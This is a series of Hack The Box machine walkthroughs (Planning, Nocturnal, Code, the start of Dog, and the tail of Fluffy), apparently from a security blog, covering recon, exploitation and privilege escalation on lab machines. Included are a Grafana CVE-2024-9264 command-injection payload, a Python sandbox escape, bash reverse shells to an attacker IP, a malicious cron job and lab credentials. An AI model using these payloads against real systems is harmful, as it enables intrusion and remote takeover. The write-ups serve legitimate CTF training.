Using Certipy, the auth command was executed to authenticate as the administrator user on the domain fluffy.htb using the certificate stored in administrator.pfx. The tool identified the certificate’s SAN UPN as administrator and used it to request a Ticket Granting Ticket (TGT) from the domain controller at 10.10.11.69. The TGT was successfully obtained and saved to the credential cache file administrator.ccache. Certipy then retrieved the NT hash for administrator@fluffy.htb, which can be used for subsequent authentication or privilege escalation activities.

Remote Execution & Root Flag Retrieval

A computer screen with text on it AI-generated content may be incorrect.

We accessed the target machine via WinRM using either the authenticated credentials or the extracted NT hash, which enabled remote command execution on the system.

A computer screen with green text AI-generated content may be incorrect.
A black background with green text AI-generated content may be incorrect.

We can read the root flag by executing the command type root.txt.

The post Hack The Box: Fluffy Machine Walkthrough – Easy Difficulity appeared first on Threatninja.net.

Hack The Box: Planning Machine Walkthrouh – Easy Diffucilty

✇Threatninja.net
By: darknite
Reading Time: 9 minutes

Introduction to Planning:

In this write-up, we will explore the “Planning” machine from Hack The Box, categorised as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.

Objective:

The goal of this walkthrough is to complete the “Planning” machine from Hack The Box by achieving the following objectives:

User Flag:

During reconnaissance, extensive fuzzing was required to identify a Grafana instance vulnerable to CVE-2024-9264—a critical flaw enabling arbitrary command execution through unsanitized SQL inputs in the DuckDB CLI. By deploying a proof-of-concept exploit, I successfully extracted files and ran commands, gaining entry to the Grafana container but not the underlying host. Subsequent enumeration uncovered valid credentials for the user “enzo,” which granted SSH access to the host system.

Root Flag:

Once on the host, I discovered the Crontab-UI service—a web-based tool for managing cron jobs—running on localhost:8000 and secured with Basic Authentication. Leveraging the earlier credentials for the “enzo” user, I authenticated to the interface and added a malicious cron job configured to establish a reverse shell connection.

Enumerating the Machine

Reconnaissance:

Nmap Scan:

Begin with a network scan to identify open ports and running services on the target machine. 

nmap -sC -sV -oA initial 10.10.11.68

Nmap Output: 

┌─[dark@parrot]─[~/Documents/htb/planning]
└──╼ $nmap -sC -sV -oA initial 10.10.11.68 
# Nmap 7.94SVN scan initiated Wed Sep 10 08:09:24 2025 as: nmap -sC -sV -oA initial 10.10.11.68
Nmap scan report for 10.10.11.68
Host is up (0.048s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 62:ff:f6:d4:57:88:05:ad:f4:d3:de:5b:9b:f8:50:f1 (ECDSA)
|_  256 4c:ce:7d:5c:fb:2d:a0:9e:9f:bd:f5:5c:5e:61:50:8a (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://planning.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 10 08:09:35 2025 -- 1 IP address (1 host up) scanned in 11.35 seconds
┌─[dark@parrot]─[~/Documents/htb/planning]
└──╼ $

Analysis:

  • Port 22 (SSH): Secure Shell service for remote access.
  • Port 80 (HTTP): Web server running Apache.

Web Application Exploration:

The website for Edukate appears to be a standard educational platform.

What is Edukate?

Edukate is a free educational website template designed for online learning platforms and academic institutions. Its intuitive layout improves user engagement, while its clean, developer-friendly codebase makes customization simple. Built with Sass for easy maintenance, Edukate is optimized for page speed to deliver fast loading times and lower bounce rates. It is fully cross-browser compatible, ensuring a smooth experience across all major browsers, and SEO-friendly to help boost search engine rankings.

Source: themewagon/Edukate

No usable elements are present here.

Nothing noteworthy here either.

Web Enumeration:

Perform web enumeration to discover potentially exploitable directories and files.

gobuster vhost -u http://planning.htb -w combined_subdomains.txt --append-domain -t 50

Gobuster Output: 

┌─[dark@parrot]─[/opt/SecLists/Discovery/DNS]
└──╼ $gobuster vhost -u http://planning.htb -w combined_subdomains.txt --append-domain -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://planning.htb
[+] Method:          GET
[+] Threads:         50
[+] Wordlist:        combined_subdomains.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: grafana.planning.htb Status: 302 [Size: 29] [--> /login]
===============================================================
Finished
===============================================================
┌─[dark@parrot]─[/opt/SecLists/Discovery/DNS]
└──╼ $

Analysis:

Discovery: grafana.planning.htb

  • Gobuster found a valid virtual host: grafana.planning.htb.
  • This is likely an internal service meant for the organization’s team, not a public endpoint.
  • Since it contains grafana, it strongly suggests it is a Grafana dashboard instance.

Grafana Application

The grafana.planning.htb subdomain loads successfully and displays the Grafana login page.

We should be able to log in using the credentials provided by Hack The Box.

  • Username: admin
  • Password: 0D5oT70Fq13EvB5r

We need to inspect the traffic using Burp Suite.

First, I noticed that the endpoint /api/user/auth-tokens-rotate is available here.

We successfully gained access to the Grafana dashboard.

We also confirmed that the Grafana instance is running version 11.0.0

There are numerous tokens being rotated here.

This is what the response looks like in Burp Suite.

Critical SQL Expression Vulnerability in Grafana Enabling Authenticated LFI/RCE

This vulnerability targets Grafana 11’s experimental SQL Expressions feature, which allows users to post-process query results via custom SQL using DuckDB. The flaw arises because user input isn’t properly sanitized before being sent to the DuckDB CLI, enabling remote code execution (RCE) or arbitrary file reads. The root cause is unfiltered input passed directly to the DuckDB command-line interface. The CVSS v3.1 score is 9.9 (Critical).

Grafana doesn’t include DuckDB by default. For exploitation, DuckDB must be installed on the server and accessible in Grafana’s PATH. If it’s absent, the system is safe.

Using a PoC, we can exploit this flaw to read system files, demonstrating its impact and severity.

Let’s search Google for potential exploits targeting Grafana v11.0.0

This flaw enables authenticated users to attain remote code execution (RCE). I exploited it using the publicly available proof-of-concept from Nollium’s GitHub repository.

We successfully retrieved the /etc/passwd file.

When we ran the whoami command, it returned root, which is unexpected.

Let’s set up our listener.

Unfortunately, we were unable to execute the command due to an error.

As suspected, this is running inside a Docker container.

The environment variables reveal the Grafana admin credentials:

  • GF_SECURITY_ADMIN_USER=enzo
  • GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!.

Exploit CVE-2024-9264 using Burp Suite.

The api/ds/query endpoint is available in Grafana, and we can leverage it for this exploit.

If the full path is not specified, it responds with a “Not Found” message.

However, attempting to execute the full path results in an “Unauthorized” response.

It’s still the same; we need to send the JSON data here.

After replacing the token, it worked.

{
  "from": "1729313027261",
  "queries": [
    {
      "datasource": {"name": "Expression", "type": "__expr__", "uid": "__expr__"},
      "expression": "SELECT 1; install shellfs from community; LOAD shellfs; SELECT * FROM read_csv(\"whoami > /tmp/output.txt 2>&1 |")",
      "hide": false,
      "refId": "B",
      "type": "sql",
      "window": ""
    }
  ],
  "to": "1729334627261"
}

This JSON payload is a crafted query sent to Grafana’s api/ds/query endpoint. It uses the Expression data source with an SQL expression to run a sequence of commands: first installing and loading the shellfs extension, then executing whoami and redirecting the output to /tmp/output.txt. This effectively demonstrates command execution through CVE-2024-9264.

Reading the contents of /tmp/output.txt confirms that the whoami command executed on the target machine.

Let’s set up our listener to catch the reverse shell.

Use this SQL command to execute the bash script.

It’s hanging, which is a good sign that the payload is executing.

We successfully received a reverse shell connection.

We attempted to switch to the enzo user with su enzo, but it didn’t work.

SSH worked perfectly and allowed us to log in successfully.

We were able to read the user flag by running cat user.txt.

Escalate To Root Privileges Access

Privilege Escalation:

Locate the database file.

We discovered /opt/crrontabs/crontab.db.

The password for root_grafana is P4ssw0rdS0pRi0T3c.

Port 8000 is open here, which is unusual.

Let’s set up port forwarding for port 8000.

We need to provide the credentials to log in.

We need to use the credentials we discovered earlier to log in.

It turned out to be a cron jobs management interface.

What is Cronjob-UI?

Crontab-UI is an open-source Node.js web interface for managing cron jobs on Unix-like systems, simplifying tasks like creating, editing, pausing, deleting, and backing up crontab entries via a browser (default: http://localhost:8000). It reduces errors from manual text editing, supports error logging, email notifications, webhooks, and easy import/export for multi-machine deployment. Installation is via npm (npm install crontab-ui -g), with optional Docker support and Basic Auth for security. Ideal for beginners handling scheduled tasks.

We need to create a new cron job command.

The shell.sh file contains the reverse shell that will connect back to us.

We will use curl to fetch the file, as demonstrated earlier.

The file was transferred successfully, as expected.

We were able to access the root shell and read the root flag by running cat root.txt.

The post Hack The Box: Planning Machine Walkthrouh – Easy Diffucilty appeared first on Threatninja.net.

Hack The Box: Nocturnal Machine Walkthrough – Easy Difficulty

✇Threatninja.net
By: darknite
Reading Time: 9 minutes

Introduction to Nocturnal:

In this write-up, we will explore the “Nocturnal” machine from Hack The Box, categorised as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.

Objective:

The goal of this walkthrough is to complete the “Nocturnal” machine from Hack The Box by achieving the following objectives:

User Flag:

To grab the user flag on Nocturnal, we started by exploring the file upload functionality after creating an account. Uploading a .odt file and unpacking it revealed a hidden password inside content.xml using xmllint. Initial attempts to SSH or use pwncat-cs failed, but the password worked on the web dashboard, letting us upload files as Amanda. Leveraging the backup feature, we injected a reverse shell, landing a www-data shell. From there, we navigated the nocturnal_database directory, pulled password hashes, cracked Tobias’s password (slowmotionapocalypse), and captured the user flag

Root Flag:

For the root flag, basic enumeration showed no exploitable binaries, but port 8080 was listening. After port forwarding, we accessed the ISPConfig panel. Tobias’s credentials didn’t work, but the admin password gave us full access. Identifying the ISPConfig version from the source and Help section, we grabbed a public exploit, executed it, and gained root shell access. Finally, the root flag was obtained

Enumerating the Nocturnal Machine

Reconnaissance:

Nmap Scan:

Begin with a network scan to identify open ports and running services on the target machine. 

nmap -sC -sV -oA initial 10.10.11.64

Nmap Output: 

┌─[dark@parrot]─[~/Documents/htb/nocturnal]
└──╼ $nmap -sC -sV -oA initial 10.10.11.64
# Nmap 7.94SVN scan initiated Sat Aug  9 04:55:52 2025 as: nmap -sC -sV -oA initial 10.10.11.64
Nmap scan report for 10.10.11.64
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 20:26:88:70:08:51:ee:de:3a:a6:20:41:87:96:25:17 (RSA)
|   256 4f:80:05:33:a6:d4:22:64:e9:ed:14:e3:12:bc:96:f1 (ECDSA)
|_  256 d9:88:1f:68:43:8e:d4:2a:52:fc:f0:66:d4:b9:ee:6b (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://nocturnal.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug  9 04:56:46 2025 -- 1 IP address (1 host up) scanned in 54.95 seconds

Analysis:

  • Port 22 (SSH): OpenSSH 8.2p1 running on Ubuntu, providing secure shell access for remote login. The server exposes RSA, ECDSA, and ED25519 host keys.
  • Port 80 (HTTP): Nginx 1.18.0 serving the web application on Ubuntu. The HTTP title did not follow the redirect to http://nocturnal.htb/, indicating the presence of a web interface.

Web Enumeration:

Web Application Exploration:

The website interface appears as shown above.

Tried logging in with the credentials admin:admin, but it failed.

Here’s a smoother version:

Sadly, the credentials are invalid.

Attempted to register a new account using dark:dark, but received a “failed to register user” error.

However, account creation succeeded with test:test, which was unusual. Further troubleshooting revealed that both the username and password must contain more than six characters in total.

We were redirected to a file upload page.

Before proceeding, let’s attempt to upload a simple text file.

The upload failed because only certain file formats are allowed.

Therefore, let’s try uploading a random PDF file to the application.

In Burp Suite, it appears as shown above.

We successfully uploaded the PDF file, as shown in the screenshot above. Clicking on the uploaded file opens a PDF editor.

As shown above, the response is displayed when attempting to access the uploaded file.

Tried accessing with the admin user, but it returned a “File does not exist” error.

Capture the packet request using Burp Suite

This FFUF command uses a saved HTTP request (req.req) to fuzz inputs from names.txt over HTTP, ignoring responses with a body size of 2985 bytes.

The fuzzing results revealed three valid usernames: admin, tobias, and amanda.

The URL http://nocturnal.htb/view.php?username=amanda&file=small.odt shows that file access is controlled through query parameters, which may expose the application to IDOR vulnerabilities if manipulated.

I presume it is just a normal PDF file content.

Let’s download the file to our machine for further analysis.

The file is formatted as an OpenDocument Text.

Opening the .odt file for further examination.

Surprisingly, the file does not open in OpenOffice but instead opens with a ZIP application.

As a result, let’s extract the file on our machine.

What is xmllint?

xmllint is a tool used to open and read XML files, which are special text files that store structured information. These files can be difficult to read normally, but xmllint makes them easier to understand by organising the text. In this case, it allowed us to look inside the file and discover hidden information, such as a password.

Using the xmllint command, we can read the file as shown above.

In the content.xml file, we can use xmllint to read the contents and identify the password (arHkG7HAI68X8s1J).

Attempted to connect to the machine via SSH using the credentials, but the login failed.

Earlier attempts using pwncat-cs and SSH both failed to establish access.

As a result, we proceeded to test it through the dashboard.

Unexpectedly, the attempt was successful, allowing us to upload files as the Amanda user.

There is an Admin Panel button located at the top of the interface.

No interesting files were found upon clicking the Admin Panel link.

There is a field that requires entering a password to access the backup.

Creating a password grants access to a collection of files for review.

We can download the file.

In Burp Suite, it appears as shown above.

Entered Amanda’s password, but the system returned an “incorrect password” message.

However, we successfully unzipped the file using the password we created earlier.

Looking inside the backup directory, nothing of interest was found.

After further consideration, we attempted to enter a reverse shell payload into the password field.

Finally, we successfully obtained a www-data shell.

Nothing was missing from the file we downloaded.

There is a nocturnal_database directory present.

Let’s proceed to access the database.

We retrieved password hashes from the database.

One of the hashes was successfully cracked, revealing the password slowmotionapocalypse.

It was determined that the hashes belong to the user tobias.

We obtained the user flag by running the command cat user.txt.

Escalate to Root Privileges Access

Privilege Escalation:

There are no usable binaries available in this environment.

While checking the open ports with netstat -an, we discovered that port 8080 is open on the machine.

Setting up port forwarding for the previously identified port.

The service running on the forwarded port is ISPConfig.

Understanding ISPConfig: The Web Hosting Control Panel

ISPConfig is a web-based control panel used to manage websites, email accounts, and servers. It allows administrators to easily configure and control these services through a user-friendly interface, without needing to use complex commands. Think of it as a central dashboard for managing web hosting services.

Attempted to use Tobias’s password, but the login failed.

The admin password was successful.

Accessed the ISPConfig dashboard successfully.

The ISPConfig version was identified from the source code.

Alternatively, the version was also found in the Help section.

Let’s investigate the ISPConfig version 3.2.10p1 vulnerability that corresponds to CVE-2023-46818.

CVE-2023-46818: PHP Code Injection Vulnerability in ISPConfig 3.2.10p1

CVE-2023-46818 is a high-severity PHP code injection vulnerability affecting ISPConfig versions before 3.2.11p1. It occurs when the admin_allow_langedit setting is enabled, allowing authenticated administrators to inject and execute arbitrary PHP code via the language file editor. The flaw stems from improper sanitisation of user input in the records POST parameter of /admin/language_edit.php.

The vulnerability has a CVSS 3.1 base score of 7.2 (High), posing a significant risk. Successful exploitation can lead to full server compromise, enabling attackers to steal sensitive data, install malware, or disrupt services.

To mitigate this issue, it is recommended to upgrade to ISPConfig version 3.2.11p1 or later. Alternatively, disabling the language editor by setting admin_allow_langedit=no in /usr/local/ispconfig/security/security_settings.ini can prevent exploitation.v

Downloaded the exploit to our machine and executed it.

We obtained the root flag by running the command cat root.txt.

The post Hack The Box: Nocturnal Machine Walkthrough – Easy Difficulty appeared first on Threatninja.net.

Hack The Box: Code Machine Walkthrough – Easy Difficulity

✇Threatninja.net
By: darknite
Reading Time: 9 minutes

Introduction to Code:

In this write-up, we will explore the “Code” machine from Hack The Box, categorised as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.

Objective:

The goal of this walkthrough is to complete the “Code” machine from Hack The Box by achieving the following objectives:

User Flag: Exploit a web application’s code execution vulnerability by bypassing restricted keywords through Python class enumeration. Gain a reverse shell as the app-production user and read the user.txt flag from the user’s home directory.

Root Flag: From the app-production shell, access a SQLite database in the /app directory, extract and crack the martin user’s password, and switch to martin. Identify that martin can run a backup script as root. Create a malicious JSON file to include the /root/ directory in a backup, extract it, and read the root.txt flag.

Enumerating the Code Machine

Establishing Connectivity

I connected to the Hack The Box environment via OpenVPN using my credentials, running all commands from a Kali Linux virtual machine. The target IP address for the Cypher machine was 10.10.11.62

Reconnaissance:

Nmap Scan:

Begin with a network scan to identify open ports and running services on the target machine. 

nmap -sC -sV -oN nmap_initial.txt 10.10.11.62

Nmap Output: 

┌─[dark@parrot]─[~/Documents/htb/code]
└──╼ $nmap -sV -sC -oA initial 10.10.11.62 
# Nmap 7.94SVN scan initiated Mon Jul 21 18:11:21 2025 as: nmap -sV -sC -oA initial 10.10.11.62
Nmap scan report for 10.10.11.62
Host is up (0.25s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b5:b9:7c:c4:50:32:95:bc:c2:65:17:df:51:a2:7a:bd (RSA)
|   256 94:b5:25:54:9b:68:af:be:40:e1:1d:a8:6b:85:0d:01 (ECDSA)
|_  256 12:8c:dc:97:ad:86:00:b4:88:e2:29:cf:69:b5:65:96 (ED25519)
5000/tcp open  http    Gunicorn 20.0.4
|_http-server-header: gunicorn/20.0.4
|_http-title: Python Code Editor
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 21 18:12:09 2025 -- 1 IP address (1 host up) scanned in 48.11 seconds

Analysis:

  • Port 22 (SSH): Secure Shell service for remote access. It allows administrators to log in and manage the server using encrypted connections securely.
  • Port 5000 (HTTP): A web application is running on this port using Gunicorn 20.0.4, a Python-based web server. The site appears to be a Python Code Editor, according to the page title.

Web Enumeration:

Exploitation

Web Application Exploration:

The web interface includes a code execution feature.

We are attempting to run the following code. However, before executing it, we need to ensure all prerequisites are met. Once these conditions are satisfied, the code can be executed as intended.

import os
print(os.system("echo Hello, world!"))

Results in the following error: “The use of restricted keywords is not permitted.”

Troubleshooting Issues on the Code Machine

To bypass this, enumerate Python classes to access restricted functions:

for i in range(200):
    try:
        cls = ''.__class__.__bases__[0].__subclasses__()[i]
        if hasattr(cls, '__init__') and hasattr(cls.__init__, '__globals__'):
            builtins = cls.__init__.__globals__.get('__buil'+'tins__')
            if builtins and 'ev'+'al' in builtins:
                print(i, str(cls))
    except Exception:
        continue

Python Class Enumeration Output

The following Python classes were identified during enumeration to bypass restricted keywords on the “Code” machine.

Import and Module Classes

# 80 <class '_frozen_importlib._ModuleLock'>
# 81 <class '_frozen_importlib._DummyModuleLock'>
# 82 <class '_frozen_importlib._ModuleLockManager'>
# 83 <class '_frozen_importlib.ModuleSpec'>
# 99 <class '_frozen_importlib_external.FileLoader'>
# 100 <class '_frozen_importlib_external._NamespacePath'>
# 101 <class '_frozen_importlib_external._NamespaceLoader'>
# 103 <class '_frozen_importlib_external.FileFinder'>
# 104 <class 'zipimport.zipimporter'>
# 105 <class 'zipimport._ZipImportResourceReader'>

These classes relate to Python’s import and module loading mechanisms.

Codec and OS Classes

# 107 <class 'codecs.IncrementalEncoder'>
# 108 <class 'codecs.IncrementalDecoder'>
# 109 <class 'codecs.StreamReaderWriter'>
# 110 <class 'codecs.StreamRecoder'>
# 132 <class 'os._wrap_close'>

These involve encoding/decoding and OS operations.

Builtins and Type Classes

# 133 <class '_sitebuiltins.Quitter'>
# 134 <class '_sitebuiltins._Printer'>
# 136 <class 'types.DynamicClassAttribute'>
# 137 <class 'types._GeneratorWrapper'>
# 138 <class 'warnings.WarningMessage'>
# 139 <class 'warnings.catch_warnings'>

This enumeration reveals classes such as Quitter (index 133), which was utilised to execute commands.

Utility and Context Classes

# 166 <class 'reprlib.Repr'>
# 174 <class 'functools.partialmethod'>
# 175 <class 'functools.singledispatchmethod'>
# 176 <class 'functools.cached_property'>
# 178 <class 'contextlib._GeneratorContextManagerBase'>
# 179 <class 'contextlib._BaseExitStack'>

These handle representation and context management.

Regex and Threading Classes

# 185 <class 'sre_parse.State'>
# 186 <class 'sre_parse.SubPattern'>
# 187 <class 'sre_parse.Tokenizer'>
# 188 <class 're.Scanner'>
# 189 <class '__future__._Feature'>
# 192 <class '_weakrefset._IterationGuard'>
# 193 <class '_weakrefset.WeakSet'>
# 194 <class 'threading._RLock'>
# 195 <class 'threading.Condition'>
# 196 <class 'threading.Semaphore'>
# 197 <class 'threading.Event'>
# 198 <class 'threading.Barrier'>
# 199 <class 'threading.Thread'>

These support regex parsing and threading.

Executing Commands

Capturing Command Output

Execute the whoami command using the Quitter class, resulting in an output code of 0, indicating successful execution.

Next, capture the whoami output using the subprocess module.

print(
    ''.__class__.__bases__[0].__subclasses__()[133]
    .__init__.__globals__['__builtins__']['eval'](
        "__import__('subprocess').run(['whoami'], capture_output=True).stdout.decode()"
    )
)

The execution of the command produced the output app-production, indicating the current user context under which the process is running.

Establishing a Reverse Shell

To establish a reverse shell:

print(
    ''.__class__.__bases__[0].__subclasses__()[133]
    .__init__.__globals__['__builtins__']['eval'](
        "__import__('subprocess').run(['bash','-c','bash -i >& /dev/tcp/10.10.14.116/9007 0>&1'], shell=True)'
    )
)

The command executed successfully and returned a CompletedProcess object with the arguments [‘bash’, ‘-c’, ‘bash -i >& /dev/tcp/10.10.14.116/9007 0>&1‘] and a return code of 0, indicating unsuccessful execution.

It was time to list the available attributes and methods of the int class.

Utilise subprocess.Popen (located at index 317) to initiate a reverse shell connection:

().__class__.__bases__[0].__subclasses__()[317](
    ["/bin/bash", "-c", "bash -i >& /dev/tcp/10.10.14.116/9007 0>&1"]
)

Using subprocess.PopenUsing subprocess.Popen

This command initiates a reverse shell connection by spawning a Bash process that connects back to the specified IP address and port.

A response was successfully received from the reverse shell connection.

Once shell access is obtained, proceed to locate and read the user flag.

Escalate to Root Privileges

Privilege Escalation:

Let’s explore the app directory, which includes the folders and files

Within the instance directory, there is a file named database.db.

SQLite3 Database Enumeration on the Code Machine

Therefore, let’s run the command sqlite3 database.db to interact with the database.

The database contains two tables.

We need to extract the stored hashes from the SQLite database using sqlite3.

The screenshot above displays the extracted hashes.

Hashcat Password Cracking Process

It is uncommon to obtain a complete set of cracked hashes as shown here.

Switching to Martin

By using the previously cracked password, we can now authenticate as the user Martin. Consequently, this allows us to gain access with Martin’s privileges and proceed with further actions.

Exploring and Testing the backy.sh Script

When running sudo -l, we discovered the presence of the /usr/bin/backy.sh script.

The backy.sh script streamlines folder backups on Linux. First, it demands a JSON settings file listing folders to back up. However, without a valid file, it halts and shows an error. Moreover, it restricts backups to /var/ or /home/ directories, thus blocking unauthorized paths. Additionally, it sanitizes folder lists to prevent security breaches. Once verified, it triggers the backy tool for the backup. Ultimately, backy.sh ensures safe, controlled backups, thwarting misuse.

Creating a Malicious JSON File on Code Machine

When Martin tries to run the /usr/bin/backy.sh script with sudo, the system immediately responds by showing how to use the script properly—specifically, it requires a file named task.json as input. Therefore, the script won’t run without the correct instructions. This highlights the importance of providing the right parameters when executing commands with elevated privileges, ensuring that the intended actions are performed safely and correctly.

The original /usr/bin/backy.sh file is a script that requires a JSON task file as an argument to run properly. Without this input, it displays a usage message and does not perform any actions.

Our modified version of the script uses dark.json as the input task file to execute specific commands or actions defined within that JSON, allowing us to leverage the script’s functionality with custom instructions.

We successfully obtained the tar.bz2 file, but encountered issues that prevented us from extracting or using it.

Perhaps using the correct task.json file is necessary to properly execute the script and avoid errors.

Our goal should be to directly obtain the file itself for proper use or analysis.

It appears that we have successfully accessed the root/ directory.

The script likely didn’t work earlier because it required a specific input file (task.json) to function correctly, and running it without this file caused it to display the usage instructions instead of executing the intended tasks.

The post Hack The Box: Code Machine Walkthrough – Easy Difficulity appeared first on Threatninja.net.

Hack The Box: Dog Machine Walkthrough (Easy Difficulty)

✇Threatninja.net
By: darknite
Reading Time: 13 minutes

Introduction to Dog:

In this write-up, we’ll go step-by-step through the Dog machine from Hack The Box, rated Easy difficulty. The box involves exploring a Linux environment with a Backdrop CMS web application. The path includes abusing an exposed Git repository, exploiting a CMS vulnerability, and escalating privileges to capture both the user and root flags.

Objective on Dog Machine

The primary objective is to complete the Dog machine by accomplishing the following tasks:

  • User Flag: Obtain initial access to the Backdrop CMS by leveraging credentials (username: tiffany, password: BackDropJ2024DS2024) exposed in the settings.php file within the publicly accessible .git repository. Exploit an authenticated remote command execution vulnerability (EDB-ID: 52021) in Backdrop CMS version 1.27.1 by uploading a malicious module containing a PHP web shell, achieving a reverse shell as the www-data user. Transition to the johncusack user by reusing the exposed password and retrieving the user flag
  • Root Flag: Escalate privileges by exploiting the misconfigured /usr/local/bin/bee binary, which allows the johncusack user to run commands as root via sudo. Use the bee binary’s eval parameter to execute a privileged command, such as sudo /usr/local/bin/bee –root=/var/www/html eval “system(‘cat /root/root.txt’);”, to read the root flag and achieve full system compromise.

Reconnaissance and Enumeration on Dog Machine

Establishing Connectivity

I connected to the Hack The Box environment via OpenVPN using my credentials, running all commands from a Kali Linux virtual machine. The target IP address for the Dog machine was 10.10.11.58.

Initial Scanning

To identify open ports and services, I ran an Nmap scan:

nmap -sV -sC 10.10.11.58 -oA initial

Nmap Output:

┌─[dark@parrot]─[~/Documents/htb/dog]
└──╼ $nmap -sC -sV 10.10.11.58 -oA initial
# Nmap 7.94SVN scan initiated Sun Jun 29 18:19:32 2025 as: nmap -sC -sV -oA initial 10.10.11.58
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_  256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-git: 
|   10.10.11.58:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: todo: customize url aliases.  reference:https://docs.backdro...
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin 
| /comment/reply /filter/tips /node/add /search /user/register 
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
|_http-title: Home | Dog
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
|_http-server-header: Apache/2.4.41 (Ubuntu)
# Nmap done at Sun Jun 29 18:20:33 2025 -- 1 IP address (1 host up) scanned in 60.91 seconds

Analysis:

  • Port 22 (SSH): OpenSSH 8.2p1 running on Ubuntu; key fingerprints leaked, but no obvious auth bypass exposed.
  • Port 80 (HTTP): Apache 2.4.41 hosting Backdrop CMS 1 with an exposed .git/ repo, robots.txt leaks paths, and potential admin panel access.

Web Enumeration on Dog Machine

Exploring the Website

Navigating to http://10.10.11.58 a dog-themed website, fitting the machine’s name.

The page footer reveals that the website operates on Backdrop CMS, a platform I previously explored in the Hack The Box CarpeDiem machine walkthrough.

Accessing the login endpoint displays the login page.

The .git directory contains several internal folders related to version control.

Analysing the Git Repository

The Gobuster scan uncovered a .git directory — a significant discovery, as exposed Git repositories can leak sensitive data such as source code or credentials.

Examining settings.php

While inspecting the .git directory contents, I found several folders and files that indicate a full web application project. Directories like core, files, layouts, themes, and sites suggest an organised structure, possibly for a CMS or a custom PHP-based system. Notably, index.php appears to be the main entry point, and settings.php may contain configuration details, which could include sensitive data like database credentials. The presence of robots.txt, along with documentation files such as README.md and LICENSE.txt, further supports that this is a production-ready web application. These findings warrant a deeper inspection for potential misconfigurations or exposed credentials

The settings.php file is the main configuration file for a Backdrop CMS website. While reviewing it, I found hardcoded database credentials (root:BackDropJ2024DS2024), which is a serious security concern if exposed publicly. This means anyone with access to this file could potentially connect to the database and access or manipulate sensitive data. The file also defines paths for configuration directories, session settings, and site behaviour like caching and error handling. Additionally, it includes a unique hash_salt feature used for security tokens and one-time login links. From a security standpoint, this file contains multiple pieces of sensitive information that should never be publicly accessible. Its presence in an exposed .git directory highlights the risks of improperly secured version control systems. This misconfiguration could allow an attacker to take full control of the application or pivot further into the underlying system.

Configuration Directory Security

This section of the settings.php file specifies where the Backdrop CMS stores its configuration files, which include settings for things like content types, modules, and views. By default, these are stored in the files directory under a hashed path, like so:

$config_directories['active'] = './files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active';
$config_directories['staging'] = './files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/staging';

While this works functionally, it’s not ideal from a security perspective. These paths reside within the web root, so enabling directory listing or guessing the full path could allow someone to access sensitive configuration files directly from the browser. Backdrop’s documentation recommends moving these directories outside of the web-accessible root, like:

$config_directories['active'] = '../config/active';

Or using an absolute path:

$config_directories['active'] = '/var/www/config/active';

This ensures critical configuration data remains protected from unauthorised users.

Discovering User Information

Inside /files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active, I found a large number of JSON files, each representing different parts of the site’s active configuration — everything from enabled modules to content structure settings.

Within the update_settings.json file, a possible username tiffany was identified and noted for future reference.

Gaining Access to Backdrop CMS

Logging into the CMS

Returning to the Dog homepage via the browser, I attempted to log in. Initial guesses using common default credentials such as admin:admin and admin:password were unsuccessful. Recalling the credentials exposed in the settings.php file, I attempted to log in using root with the corresponding password (BackDropJ2024DS2024), but this also failed. After multiple attempts, I found the valid credentials:

  • Username: tiffany
  • Password: BackDropJ2024DS2024 (retrieved from settings.php)

This successful login confirmed that the username found in update_settings.json was legitimate and paired with the database password from settings.php.

Backdrop CMS Enumeration and Vulnerability Assessment

